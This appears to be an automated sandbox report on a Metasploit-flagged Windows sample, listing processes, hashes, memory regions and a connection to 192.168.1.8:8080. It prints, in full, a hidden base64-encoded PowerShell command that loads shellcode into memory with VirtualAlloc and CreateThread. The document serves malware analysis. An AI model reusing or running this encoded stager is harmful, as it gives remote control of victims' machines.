dABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE0AZwBTACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAA5ADcALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeABjADUALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAZQA3ACwAMAB4ADYAYwAsADAAeABjAGEALAAwAHgAMwAwACwAMAB4AGYAYgAsADAAeAA5ADkALAAwAHgAOAA1ACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgANQBhACwAMAB4AGYAYQAsADAAeAA4AGEALAAwAHgAZAAxACwAMAB4ADMAZQAsADAAeAA3ADEALAAwAHgAYgBlACwAMAB4AGUANQAsADAAeAAzADcALAAwAHgANgAwACwAMAB4AGIANAAsADAAeAA1ADcALAAwAHgANAA0ACwAMAB4AGUAMAAsADAAeAA5ADkALAAwAHgANAAzACwAMAB4ADYANQAsADAAeAAwADkALAAwAHgAOQA2ACwAMAB4ADEAOQAsADAAeABhAGQALAAwAHgAZgBhACwAMAB4ADEAZQAsADAAeAA5ADcALAAwAHgAOABiACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOAAsADAAeAA1ADQALAAwAHgANQBkACwAMAB4AGQAMQAsADAAeAAzAGMALAAwAHgAYgA3ACwAMAB4ADUAYwAsADAAeAAxAGEALAAwAHgAMwAxACwAMAB4AGIANgAsADAAeAA5ADkALAAwAHgAZQBkACwAMAB4ADMAZgAsADAAeAA1ADcALAAwAHgANwA3ACwAMAB4ADYANgAsADAAeABlAGQALAAwAHgAYgA3ACwAMAB4AGYAMwAsADAAeAAzAGEALAAwAHgAMgBlACwAMAB4AGUAZgAsADAAeAAwADIALAAwAHgANgBhACwAMAB4AGMANQAsADAAeAA0AGYALAAwAHgANwBkACwAMAB4ADAAZgAsADAAeAAxAGEALAAwAHgAMwBiACwAMAB4ADMAMQAsADAAeAAwAGUALAAwAHgANABiACwAMAB4ADkANAAsADAAeAA0ADIALAAwAHgANAA4ACwAMAB4ADQAYgAsADAAeAAxADQALAAwAHgAOAA2ACwAMAB4AGUAMwAsADAAeABjADMALAAwAHgAMABlACwAMAB4AGEAZAAsADAAeAAzAGEALAAwAHgAYQA3ACwAMAB4ADEAMgAsADAAeAA5AGMALAAwAHgANAAzACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAZQBhACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAwACwAMAB4ADIAMwAsADAAeAA4ADYALAAwAHgANQA1ACwAMAB4ADAAMwAsADAAeAA0ADkALAAwAHgAYQBhACwAMAB4ADUANwAsADAAeAA1AGIALAAwAHgANgBhACwAMAB4ADUAMgAsADAAeAAyADIALAAwAHgAOQA3ACwAMAB4ADgAOAAsADAAeABlAGYALAAwAHgAMwA1ACwAMAB4ADYAYwAsADAAeABmADIALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeAA3ADMALAAwAHgANQA0ACwAMAB4AGIAOAAsADAAeAA2ADMALAAwAHgANQAwACwAMAB4ADYANAAsADAAeAA2AGQALAAwAHgAZgA1ACwAMAB4ADEAMwAsADAAeAA2AGEALAAwAHgAZABhACwAMAB4ADcAMQAsADAAeAA3AGIALAAwAHgANgBmACwAMAB4AGQAZAAsADAAeAA1ADYALAAwAHgAZgA3ACwAMAB4ADgAYgAsADAAeAA1ADYALAAwAHgANQA5ACwAMAB4AGQAOAAsADAAeAAxAGQALAAwAHgAMgBjACwAMAB4ADcAZQAsADAAeABmAGMALAAwAHgANAA2ACwAMAB4AGYANwAsADAAeAAxAGYALAAwAHgAYQA1ACwAMAB4ADIAMgAsADAAeAA1ADYALAAwAHgAMQBmACwAMAB4AGIANQAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADgANQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4ADUAZQAsADAAeABiADkALAAwAHgAMwBkACwAMAB4AGMAMQAsADAAeAA1AGYALAAwAHgAZQA3ACwAMAB4AGEAOQAsADAAeAAwAGQALAAwAHgAYQBkACwAMAB4ADEAOAAsADAAeAAyAGEALAAwAHgAMQBhACwAMAB4AGEANgAsADAAeAA2AGIALAAwAHgAMQA4ACwAMAB4ADgANQAsADAAeAAxAGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAA0AGUALAAwAHgAYgBhACwAMAB4AGYAMwAsADAAeAAyADEALAAwAHgANQA4ACwAMAB4ADMAZAAsADAAeAAyAGIALAAwAHgAOAA5ACwAMAB4ADAAOQAsADAAeABjADAALAAwAHgAYwBjACwAMAB4AGUAYQAsADAAeAAwADAALAAwAHgAMAA2ACwAMAB4ADkAOAAsADAAeABiAGEALAAwAHgAMwBhACwAMAB4AGEAZgAsADAAeABhADEALAAwAHgANQAwACwAMAB4AGIAYgAsADAAeAA1ADAALAAwAHgANwA0ACwAMAB4AGMAYwAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIANwAsADAAeABiADkALAAwAHgAYwA3ACwAMAB4ADEAZQAsADAAeAA1ADAALAAwAHgAYgA4ACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAMwAwACwAMAB4ADMANQAsADAAeAAyADEALAAwAHgANgBkACwAMAB4ADYAMAAsADAAeAAxADYALAAwAHgAZgBlACwAMAB4AGMAZAAsADAAeABkADAALAAwAHgAZAA2ACwAMAB4AGEAZQAsADAAeABhADUALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeAA5ADEALAAwAHgAZAA1ACwAMAB4ADQANAAsADAAeAAzADMALAAwAHgAYgBhACwAMAB4ADcAZgAsADAAeABhAGIALAAwAHgAZQBhACwAMAB4ADkAMgAsADAAeAAxADcALAAwAHgANQAyACwAMAB4AGIANwAsADAAeAA2ADkALAAwAHgAOAA2ACwAMAB4ADkAYgAsADAAeAA2AGQALAAwAHgAMQA0ACwAMAB4ADgAOAAsADAAeAAxADAALAAwAHgAOAAyACwAMAB4AGUAOAAsADAAeAA0ADYALAAwAHgAZAAxACwAMAB4AGUAZgAsADAAeABmAGEALAAwAHgAMwBlACwAMAB4ADEAMQAsADAAeABiAGEALAAwAHgAYQAxACwAMAB4AGUAOAAsADAAeAAyAGUALAAwAHgAMQAwACwAMAB4AGMAZgAsADAAeAAxADQALAAwAHgAYgBiACwAMAB4ADkAZgAsADAAeAA0ADYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeABhADIALAAwAHgAYgBmACwAMAB4AGEAMwAsADAAeABmAGMALAAwAHgANQBkACwAMAB4AGUAYQAsADAAeABiADgALAAwAHgAMwA1ACwAMAB4AGMAOAAsADAAeAA1ADUALAAwAHgAZAA2ACwAMAB4ADMAOQAsADAAeAAxAGMALAAwAHgANQA2ACwAMAB4ADIANgAsADAAeAA2AGMALAAwAHgANwA2ACwAMAB4ADUANgAsADAAeAA0AGUALAAwAHgAYwA4ACwAMAB4ADIAMgAsADAAeAAwADUALAAwAHgANgBiACwAMAB4ADEANwAsADAAeABmAGYALAAwAHgAMwA5ACwAMAB4ADIAMAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA5ADUALAAwAHgAMAA1ACwAMAB4ADYAOQAsADAAeAA5ADYALAAwAHgAYwAwACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgANgA5ACwAMAB4ADIANwAsADAAeAA3ADMALAAwAHgAMABhACwAMAB4AGIAYwAsADAAeAAwADEALAAwAHgAMAAxACwAMAB4ADYAMgAsADAAeAA3AGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEEAQgBUAHUAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEEAQgBUAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEEAQgBUAHUALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nlh19w38.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37A5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC37A4.tmp"
Network
| Country | Destination | Domain | Proto |
| N/A | 192.168.1.8:8080 | tcp |
Files
memory/2168-0-0x0000000000E30000-0x0000000000E3A000-memory.dmp
memory/2168-1-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
memory/3012-6-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-7-0x000000001B690000-0x000000001B972000-memory.dmp
memory/3012-8-0x0000000002080000-0x0000000002088000-memory.dmp
memory/3012-9-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
memory/3012-10-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-11-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
memory/3012-12-0x0000000002C50000-0x0000000002CD0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2QTD3V5Q7LWGAFZKNGA6.temp
| MD5 | dc3a05e3dae1b8c8dbbf528a0cae46fc |
| SHA1 | 11e27eb193c0a9a828a1907ddb5dee6a6eb10145 |
| SHA256 | 7ac6b08f7f096178813cf1b65e605ebebec4e3fe2b91b2030e808d2b126ffe84 |
| SHA512 | b782b2000367a4a3c3fce996133dc85f1548ee8c386b831c9d89484dfc7c23d8b2e517c7ff576eb145ca9d7fdcb36cc872849836c7f2c148b778fe79102e53d7 |
memory/2536-15-0x0000000073220000-0x00000000737CB000-memory.dmp
memory/2536-16-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/2536-17-0x0000000073220000-0x00000000737CB000-memory.dmp
memory/2536-18-0x0000000002AF0000-0x0000000002B30000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\nlh19w38.cmdline
| MD5 | 02a944b4ad532b30993b53b510760d8f |
| SHA1 | 04ff81144a3456b01ff3c5a3442db57c5606d732 |
| SHA256 | 8f3efa70c0bace1aa5ebefc1c1ac0681289f5e194f79823c8a21810da51f8f45 |
| SHA512 | e31e57c5396ae53e5f1674f9cc9a950902622470c9f6a1f276d8eafad0ba37886febb46412dceaeeeb47c8abef9a7fa9a7c3ab9958bf9f3353f682be9c65a799 |
\??\c:\Users\Admin\AppData\Local\Temp\nlh19w38.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\CSC37A4.tmp
| MD5 | e4cd4aeea583065372971c2a5d6003d4 |
| SHA1 | fc448a91047a3be235764ce302c198e22e861357 |
| SHA256 | 53da6544a45748fe2f25e5eb4cbf632efe4825e0f54471d4aa3dc8c85e3c7dd1 |
| SHA512 | b06d35d00f6de7299ef17ec9822a6d3f196ca414f1a5420696224653e6f5a72540f2b27bdcce53f3def569ff20475de5be233979f9c80891344a8066f5e57fe0 |
memory/2928-28-0x0000000000AE0000-0x0000000000B20000-memory.dmp
memory/3012-24-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES37A5.tmp
| MD5 | f5deb5d2eaaaecfeb9603afe891fd4b7 |
| SHA1 | 674e7c9fc72058e92599d8cc9c0cf0f00894a7a3 |
| SHA256 | 7af5aa4cff9e6af6563efc0f6f93a97ae3c359fcb62b91833aca96b412219d77 |
| SHA512 | aae83ecbbee11d6e6b93f11c1e444d96538379ae086bc95180c83a4ce9ad342d029a7944aec6c1727c730998190b18228a318360b690d95d0dbd9aac127e8cfe |
C:\Users\Admin\AppData\Local\Temp\nlh19w38.dll
| MD5 | 21239c2e089947d4e073c3effe845084 |
| SHA1 | ebb1f39c9d0cfd263fa16fc42455fcfb0fd261a4 |
| SHA256 | 2ab28ee4d15abd12320c640da8bc5fd7ff1a6489fb1fef82623ebe6ad5e0492c |
| SHA512 | ba348c9070120158434dcd9b42a9bbb047faae6bfd9f4c2ef9d75cb17f078d5a7dc4b78903bc94c136357de29526adf4eb342b89da075d454e1497a7d02c835a |
C:\Users\Admin\AppData\Local\Temp\nlh19w38.pdb
| MD5 | 641904e96d329521cce233e0668456ab |
| SHA1 | 07415387d44584e6b164f524fd2a70a926774953 |
| SHA256 | 643310c49f06b94e4cb21ffbdad8e6d6f8ef2ad75cc3cd4afcd6161bc18205c9 |
| SHA512 | b99949580d7d16444b8d3a9ba751f759c81855665cefe573f91ab9d76681b5ea7902c7a0ca28b020cdc9019a1a0d68ea7aced592464762a2eccb40445cd104da |
memory/2536-36-0x0000000002CF0000-0x0000000002CF1000-memory.dmp
memory/2536-37-0x0000000002CF0000-0x0000000002CF1000-memory.dmp
memory/2168-38-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
memory/3012-39-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-40-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-41-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
memory/3012-42-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-43-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/2536-44-0x0000000073220000-0x00000000737CB000-memory.dmp
memory/2536-45-0x0000000002AF0000-0x0000000002B30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 16:46
Reported
2024-04-19 16:49
Platform
win10v2004-20240412-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
MetaSploit
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe
"C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhACwAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACwAMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACY